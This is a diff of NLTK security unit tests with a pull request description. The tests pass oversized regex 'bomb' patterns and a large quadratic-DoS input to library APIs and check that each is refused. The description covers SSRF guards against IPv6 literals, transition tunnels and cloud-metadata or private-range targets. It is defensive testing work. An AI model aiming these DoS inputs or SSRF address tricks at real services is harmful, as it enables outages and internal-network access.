+# bounded pattern returns almost immediately; this only has to be long enough
+# that a fresh interpreter's ``import nltk`` under a fully loaded CI/test host
+# never trips it, while still catching a genuine unbounded hang.
+_LIMIT = 90
 
 
 def _run(code):

--- a/nltk/test/unit/test_redos_compile_dos.py
+++ b/nltk/test/unit/test_redos_compile_dos.py
@@ -300,3 +300,129 @@ def test_canonical_evil_regex_never_hangs_match(pattern, bait):
         tp.search(bait, timeout=1.0)
     except TimeoutError:
         pass  # the wall-clock cap fired: bounded, not hung - exactly the defence
+
+
+# ---------------------------------------------------------------------------
+# Bypass entry points: public APIs that compile a caller pattern with RAW
+# re/regex (not redos.compile) now route the source through redos.check_pattern.
+# ---------------------------------------------------------------------------
+
+_BIG = "a" * (MAX_PATTERN_LENGTH + 1)
+
+
+def test_chunk_tag_pattern_expander_refuses_bomb():
+    from nltk.chunk.regexp import tag_pattern2re_pattern
+
+    with pytest.raises(ValueError):
+        tag_pattern2re_pattern("<NN>" * (MAX_PATTERN_LENGTH // 4 + 1))
+
+
+def test_chunk_chunkrule_refuses_bomb_tag_pattern():
+    from nltk.chunk.regexp import ChunkRule
+
+    with pytest.raises(ValueError):
+        ChunkRule("<NN>" * (MAX_PATTERN_LENGTH // 4 + 1), "bomb")
+
+
+def test_regexpparser_refuses_bomb_grammar():
+    from nltk.chunk.regexp import RegexpParser
+
+    grammar = "NP: {" + "<NN>" * (MAX_PATTERN_LENGTH // 4 + 1) + "}"
+    with pytest.raises(ValueError):
+        RegexpParser(grammar)
+
+
+def test_chunk_ordinary_grammar_still_parses():
+    from nltk.chunk.regexp import RegexpParser
+
+    cp = RegexpParser("NP: {<DT>?<JJ>*<NN>}")
+    tree = cp.parse([("the", "DT"), ("big", "JJ"), ("dog", "NN"), ("barked", "VBD")])
+    assert "NP" in str(tree)
+
+
+def test_syllable_tokenizer_refuses_bomb_vowels():
+    from nltk.tokenize import SyllableTokenizer
+
+    st = SyllableTokenizer()
+    st.vowels = "a" * (MAX_PATTERN_LENGTH // 2 + 1)  # "|".join -> ~2x, over the cap
+    with pytest.raises(ValueError):
+        st.validate_syllables(["hello"])
+
+
+def test_token_searcher_refuses_bomb_query():
+    from nltk.text import TokenSearcher
+
+    ts = TokenSearcher(["the", "dog", "barked"])
+    with pytest.raises(ValueError):
+        ts.findall("<" + _BIG + ">")
+
+
+def test_help_tagset_refuses_bomb_pattern():
+    help_ = pytest.importorskip("nltk.help")
+    try:
+        with pytest.raises(ValueError):
+            help_.brown_tagset(_BIG)
+    except LookupError:
+        pytest.skip("brown tagset help data not installed")
+
+
+# ---------------------------------------------------------------------------
+# Library-wide coverage: the rest of the caller-controlled compile sites found
+# by auditing the whole tree now route their source through redos.check_pattern.
+# ---------------------------------------------------------------------------
+
+
+def test_internals_find_jar_iter_refuses_bomb_regex():
+    from nltk.internals import find_jar_iter
+
+    with pytest.raises(ValueError):
+        list(find_jar_iter(_BIG, is_regex=True))
+
+
+def test_internals_find_jar_iter_literal_name_not_guarded():
+    # is_regex=False -> the name is a literal, never compiled, so a long name
+    # must NOT be rejected by the pattern guard (only "jar not found").
+    from nltk.internals import find_jar_iter
+
+    try:
+        list(find_jar_iter("x" * (MAX_PATTERN_LENGTH + 1), is_regex=False))
+    except ValueError:
+        pytest.fail("literal jar name wrongly rejected by the regex guard")
+    except LookupError:
+        pass  # jar-not-found is the expected outcome
+
+
+def test_chunkscore_refuses_bomb_chunk_label():
+    from nltk.chunk.util import ChunkScore
+
+    with pytest.raises(ValueError):
+        ChunkScore(chunk_label=_BIG)
+
+
+def test_read_regexp_block_refuses_bomb_start_re():
+    import io
+
+    from nltk.corpus.reader.util import read_regexp_block
+
+    with pytest.raises(ValueError):
+        read_regexp_block(io.StringIO("data"), _BIG)
+
+
+def test_read_regexp_block_ordinary_still_works():
+    import io
+
+    from nltk.corpus.reader.util import read_regexp_block
+
+    out = read_regexp_block(io.StringIO(">start\nl1\nl2\n"), r"^>")
+    assert out == [">start\nl1\nl2\n"]
+
+
+def test_framenet_frames_refuses_bomb_pattern():
+    corpus = pytest.importorskip("nltk.corpus")
+    try:
+        corpus.framenet.frames(_BIG)
+    except ValueError:
+        return  # guard fired
+    except LookupError:
+        pytest.skip("framenet data not installed")
+    pytest.fail("framenet.frames did not refuse a bomb pattern")

--- a/nltk/test/unit/test_reviews_security.py
+++ b/nltk/test/unit/test_reviews_security.py
@@ -17,12 +17,14 @@ from nltk.corpus.reader.reviews import FEATURES, ReviewsCorpusReader
 
 from . import _mp_ctx
 
-# A long, bracket-less word run: ~250 KB. Linear with the bounded regex
-# (milliseconds); ~quadratic and ~50 s with the old unbounded one.
-_CRAFTED_LINE = "word " * 50_000
-# Generous vs. the linear cost (which is ~ms after process startup), but far
-# below the quadratic regression cost, so a regression fails fast and cleanly.
-_TIMEOUT = 15
+# A long, bracket-less word run: ~1 MB. Linear with the bounded regex
+# (milliseconds); ~quadratic and many minutes with the old unbounded one. Sized
+# so the quadratic cost stays far above _TIMEOUT even as _TIMEOUT is generous.
+_CRAFTED_LINE = "word " * 200_000
+# Generous vs. the linear cost (~ms after process startup), so a loaded CI host
+# slow to spawn a process and import nltk does not trip it, yet far below the
+# quadratic regression cost at this size, so a regression still fails fast.
+_TIMEOUT = 60
 
 
 def _features_worker(result_q):


### PR DESCRIPTION
## Summary

Started as a port of the GHSA-8mgp security regression tests that pass against `develop`, then grew to fix the cross-version CI failure those tests exposed and to close a fail-open found while expanding the SSRF harness. Verified on **both python3.10 and python3.13** (the versions the CI failure was specific to), plus a 1235-test regression sweep across the security / network / downloader / data / zip / gzip / traversal suites.

## SSRF source hardening (`nltk/pathsec.py`)

1. **6to4 / Teredo transition tunnels refused outright** (`_ip_is_forbidden`). Their `is_global` classification varies across CPython patch levels, so a wrapper was allowed on 3.10/3.11 but refused on 3.12+ — the exact cross-version CI failure. Refusing them outright is consistent and strictly safer (NLTK never fetches over one).
2. **IP-literal hosts classified directly, independent of the resolver** (`validate_network_url`). `getaddrinfo` returns nothing for a literal whose address family the host lacks, so a bracketed IPv6 literal (`[::1]`, `[::ffff:127.0.0.1]`, `[fd00::1]`, …) **failed open** through the resolve loop (CWE-918). Now classified up front, mirroring the existing numeric-IPv4 canonicalizer. A real-machine probe confirmed this leaked before the fix and is closed after, on both versions.

## Test coverage

New suites (pass 100% on `develop`): `test_attack_{dos,java_tool,path_sandbox,ssrf,xml_xss}_expanded.py`; added cases in `test_quadratic_dos.py` (+9) and `test_redos_compile_dos.py` (+13).

Expanded during this work:
- **SSRF** (sections 13–15): NAT64 / 6to4 / Teredo / IPv4-mapped / IPv4-compatible wrappers of loopback, cloud-metadata, private and CGNAT ranges; IP-literal hosts failing closed with an empty resolver; numeric encodings of non-loopback internal targets on the Windows path; public wrappers and public IPv6 literals kept as over-block guards.
- **Paths** (section 9): gzip bomb via the public `GzipFileSystemPathPointer.open`, aggregate bomb via the hardened `ZipFile.open().read()` path, and a POSIX benign-literal over-block guard. A real-archive probe confirmed the zip/gzip/path guards leak nothing, so no source change was needed there.

Two proxy-isolation helpers (here and in `test_pathsec.py`) also neuter `_ip_is_forbidden`, so an IP-literal target is refused by the proxy guard under test rather than by the new literal check.

Part of the GHSA-8mgp umbrella (#3753).